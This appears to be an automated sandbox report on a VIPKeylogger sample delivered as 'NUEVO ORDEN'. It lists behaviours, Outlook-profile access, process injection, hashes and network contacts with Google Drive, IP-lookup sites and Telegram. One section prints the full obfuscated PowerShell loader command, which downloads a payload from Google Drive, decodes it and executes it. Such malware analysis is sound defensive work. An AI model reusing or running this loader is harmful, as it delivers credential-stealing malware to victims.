Analysis Overview
SHA256
98e999b9e6771e3f4dd54455ece73c011dea3c7f93ae9a75932b2a0a08765f25
Threat Level: Known bad
The file 22102024_1632_22102024_NUEVO ORDEN.rar was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
outlook_office_path
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
| Field | Value |
| Reported | 2024-10-22 16:32 |
Signatures
Analysis: behavioral2
Detonation Overview
| Field | Value |
| Submitted | 2024-10-22 16:32 |
| Reported | 2024-10-22 16:38 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 295s |
| Max time network | 207s |
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1492 wrote to memory of 2884 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1492 wrote to memory of 2884 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 169.8.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whllnpm4.hmz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 806286a9ea8981d782ba5872780e6a4c |
| SHA1 | 99fe6f0c1098145a7b60fda68af7e10880f145da |
| SHA256 | cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713 |
| SHA512 | 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e |
C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo
| MD5 | 15d4bf8d1435c92eafc43ebdff22b873 |
| SHA1 | 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a |
| SHA256 | ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce |
| SHA512 | 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c |
Analysis: behavioral1
Detonation Overview
| Field | Value |
| Submitted | 2024-10-22 16:32 |
| Reported | 2024-10-22 16:38 |
| Platform | win7-20241010-en |
| Max time kernel | 122s |
| Max time network | 178s |
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. 
Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe 
UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK 
Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
memory/2884-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/2884-5-0x000000001B3F0000-0x000000001B6D2000-memory.dmp
memory/2884-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2884-7-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-8-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-9-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-11-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-13-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2884-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-16-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\POUVG0AM6I18VFV204OS.temp
| MD5 | 032aaf6805a5d3992b2c5e97cf0c2016 |
| SHA1 | ab45d2ab666805190929d6319606dfdf276e2469 |
| SHA256 | 979e3b251c22b73ad7779ce4fe1da8ed08188f2ea7477ed0dab8048d5ce0588d |
| SHA512 | 88f70b036a7ea55772ff4d01b36b6d592117d94461873c5d66f38b26c28a0a2cabc2099731da57da36cf37935ece9ee77249148d4003829edc4d93d7acb22c7c |
C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo
| MD5 | 15d4bf8d1435c92eafc43ebdff22b873 |
| SHA1 | 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a |
| SHA256 | ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce |
| SHA512 | 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c |
memory/2852-20-0x0000000006180000-0x000000000B948000-memory.dmp
memory/2272-41-0x0000000000330000-0x0000000001392000-memory.dmp
memory/2272-42-0x0000000000330000-0x0000000001392000-memory.dmp
memory/2272-43-0x0000000000330000-0x0000000000378000-memory.dmp